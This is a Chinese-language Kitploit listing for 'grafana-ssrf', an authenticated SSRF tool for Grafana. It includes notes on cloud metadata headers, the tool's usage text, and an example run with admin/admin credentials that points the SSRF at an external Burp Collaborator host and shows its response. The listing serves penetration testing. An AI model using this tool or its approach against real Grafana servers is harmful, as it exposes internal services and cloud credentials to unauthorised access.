Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
grafana-ssrf — 经过身份验证的 Grafana SSRF 漏洞 | Kitploit
工具/GitHubGitHub/randomrobbiebf/grafana-ssrf
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集云安全红队
GitHubrandomrobbiebf/grafana-ssrf

grafana-ssrf

经过身份验证的 Grafana SSRF 漏洞

查看仓库
8327102年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

grafana-ssrf

Grafana 中经过身份验证的 SSRF。

注意事项

  • 已为所有 SSRF 添加 Azure 元数据标头
  • 已为所有 SSRF 添加 Google 元数据标头
  • 无论何种情况,SSRF 都不会跟随重定向,因此请确保 URL 是直接地址。
  • 如果通过 SSO 或其他非 Grafana 方式登录,请获取您的会话 Cookie 并使用 -s 标志

用法

usage: grafana-ssrf.py [-h] [-s SESSION] [-u URL] [-H HOST] [-f FILE] [-U USERNAME]
                  [-P PASSWORD]

optional arguments:
  -h, --help            show this help message and exit
  -s SESSION, --session SESSION
                        Session Cookie Value
  -u URL, --url URL     URL of host to check will need http or https
  -H HOST, --host HOST  Host for Grafana
  -f FILE, --file FILE  File of URLS to check SSRF Against
  -U USERNAME, --username USERNAME
                        Username for Grafana
  -P PASSWORD, --password PASSWORD
                        Password for Grafana

示例

python3 grafana.py -U admin -P admin -H http://localhost:3000 -u http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net
Refreshed Sources
SSRF Source Updated
Status code:   200
Response body: <html><body>c7yzzb4zyj5v14wkpi2nxvzjigz</body></html>
Deleted Old SSRF Source

别忘了看看我们开放的职位!

https://bishopfox.com/jobs#open-positions - 快来加入 Fox 团队吧!

下载工具